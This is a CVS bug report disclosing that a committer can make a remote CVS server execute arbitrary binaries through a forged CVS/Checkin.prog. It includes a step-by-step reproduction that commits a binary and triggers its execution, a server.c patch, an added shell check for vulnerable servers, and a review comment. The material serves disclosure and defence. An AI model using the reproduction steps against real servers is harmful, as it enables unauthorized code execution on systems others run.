>Submitter-Id:	net
>Originator:	Tanaka Akira
>Organization:	net
>Confidential:	no
>Synopsis:	Checkin.prog and Update.prog are enabled even with a remote repository.
>Severity:	critical
>Priority:	high
>Category:	cvs
>Class:		sw-bug
>Release:	cvs-1.10.8.1
>Environment:
System: Linux serein.m17n.org 2.2.14-5k4 #1 Sun Mar 12 15:33:30 PST 2000 i686 unknown
Architecture: i686

--------------------------------------------------------------------------------
>Description:
A committer can execute an arbitrary binary on a cvs server using Checkin.prog.

Usually CVS/Checkin.prog in a working directory is copied from CVSROOT/modules
when the directory is checked out, and it is sent back to the server and
executed when committing. Note that when it is executed, the committed files
exist in the current directory.

Since a working directory can be modified by the committer who has it,
Checkin.prog may be modified or even newly created. If an evil committer does
so, the cvs server executes such a forged Checkin.prog.

Also note that the evil committer can create an arbitrary binary file by
`cvs add -kb' and `cvs commit'. So the evil committer can execute a
just-committed binary file via Checkin.prog, triggered by the `cvs commit'.

If the server admin provides general shell access to committers, this is not
so big a problem. But if the admin doesn't want to provide it, this is a
security problem.

Because cvs.texinfo says the following, I think this behaviour --- Checkin.prog
and Update.prog working --- is not intentional.

    Note also that the commit and update programs work ONLY when using
    local repository access - the files simply aren't created when sources
    are checked out from a pserver or other remote CVS.
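As an added check that is not part of this bug report: the shell function
below reads a CVS server's answer to the protocol's `valid-requests' request
and reports whether the server still advertises the Checkin-prog and
Update-prog requests, which are the wire-level requests behind
CVS/Checkin.prog and CVS/Update.prog. A server that no longer lists them has
the fix in this report (or an equivalent) applied. The two transcripts
embedded in the script are constructed, abbreviated samples, not captured
server output.

```shell
#!/bin/sh
# Added example (not part of the bug report): check whether a CVS server
# still advertises the Checkin-prog / Update-prog protocol requests.

# Constructed sample: abbreviated answer of an unpatched CVS 1.10.x server
# to a "valid-requests" request (a real list is longer).
SAMPLE_UNPATCHED='Valid-requests Root Valid-responses valid-requests Repository Directory Max-dotdot Static-directory Sticky Checkin-prog Update-prog Entry Kopt Checkin-time Modified Unchanged Argument ci co update noop
ok'

# Constructed sample: the same server after the two REQ_LINE entries for
# Checkin-prog and Update-prog are removed from server.c.
SAMPLE_PATCHED='Valid-requests Root Valid-responses valid-requests Repository Directory Max-dotdot Static-directory Sticky Entry Kopt Checkin-time Modified Unchanged Argument ci co update noop
ok'

# cvs_server_accepts_prog_requests: reads a server transcript on stdin,
# prints each program-execution request the server still advertises, and
# returns 1 if any was found (server still runs client-supplied programs),
# 0 if the server is clean.
cvs_server_accepts_prog_requests() {
    found=0
    reqs=$(grep '^Valid-requests ' | head -n 1)
    reqs=${reqs#Valid-requests }
    for req in Checkin-prog Update-prog; do
        # Pad with spaces so "Checkin-time" cannot match "Checkin-prog".
        case " $reqs " in
            *" $req "*)
                echo "server still accepts: $req"
                found=1
                ;;
        esac
    done
    return $found
}

# Run the check against both constructed samples.
printf '%s\n' "$SAMPLE_UNPATCHED" | cvs_server_accepts_prog_requests || echo "unpatched sample: still vulnerable"
printf '%s\n' "$SAMPLE_PATCHED" | cvs_server_accepts_prog_requests && echo "patched sample: clean"
```

To test a real server in local (rsh-style) mode, the same function can be fed
the output of `cvs server', which reads protocol requests on stdin; the
request sequence assumed here is a Root line followed by valid-requests, for
example `printf 'Root /tmp/cvs\nvalid-requests\n' | cvs server |
cvs_server_accepts_prog_requests'. Against a pserver the authentication
handshake has to be sent first.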
>How-To-Repeat:
% cvs -d :pserver:test@localhost:/tmp/cvs -f co somemodule
cvs server: Updating somemodule
% cd somemodule
% cp /bin/ls binary
% cvs add -kb binary
cvs server: scheduling file `binary' for addition
cvs server: use 'cvs commit' to add this file permanently
% echo ./binary > CVS/Checkin.prog
% cvs commit -m 'test'
cvs commit: Examining .
RCS file: /tmp/cvs/somemodule/binary,v
done
Checking in binary;
/tmp/cvs/somemodule/binary,v  <--  binary
initial revision: 1.1
done
cvs server: Executing ''./binary' '/tmp/cvs/somemodule''
#cvs.lock  #cvs.wfl.serein.m17n.org.14330  binary,v
% cvs -v

Concurrent Versions System (CVS) 1.10.8 (client/server)

Copyright (c) 1989-1998 Brian Berliner, david d `zoo' zuhn,
                        Jeff Polk, and other authors

CVS may be copied only under the terms of the GNU General Public License,
a copy of which can be found with the CVS distribution kit.

Specify the --help option for further information about CVS
%

>Fix:
--- server.c-	Fri Apr 28 15:37:13 2000
+++ server.c	Fri Apr 28 15:38:06 2000
@@ -4553,8 +4553,6 @@
     REQ_LINE("Max-dotdot", serve_max_dotdot, 0),
     REQ_LINE("Static-directory", serve_static_directory, 0),
     REQ_LINE("Sticky", serve_sticky, 0),
-    REQ_LINE("Checkin-prog", serve_checkin_prog, 0),
-    REQ_LINE("Update-prog", serve_update_prog, 0),
     REQ_LINE("Entry", serve_entry, RQ_ESSENTIAL),
     REQ_LINE("Kopt", serve_kopt, 0),
     REQ_LINE("Checkin-time", serve_checkin_time, 0),
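Review bot: the two removed REQ_LINE entries still reference serve_checkin_prog and serve_update_prog, which this hunk leaves defined but now unreachable from the request table; remove those handlers (and the server-side code that writes the program name into the working directory) in the same patch, otherwise the dead handlers remain available for someone to wire back in and the build may warn about unused functions. Since the table is the server's request dispatch, a client that still sends Checkin-prog or Update-prog will now be handled as sending an unrecognised request rather than having its program recorded; that change in behaviour is worth a line in the ChangeLog and in the cvsclient documentation of the two requests.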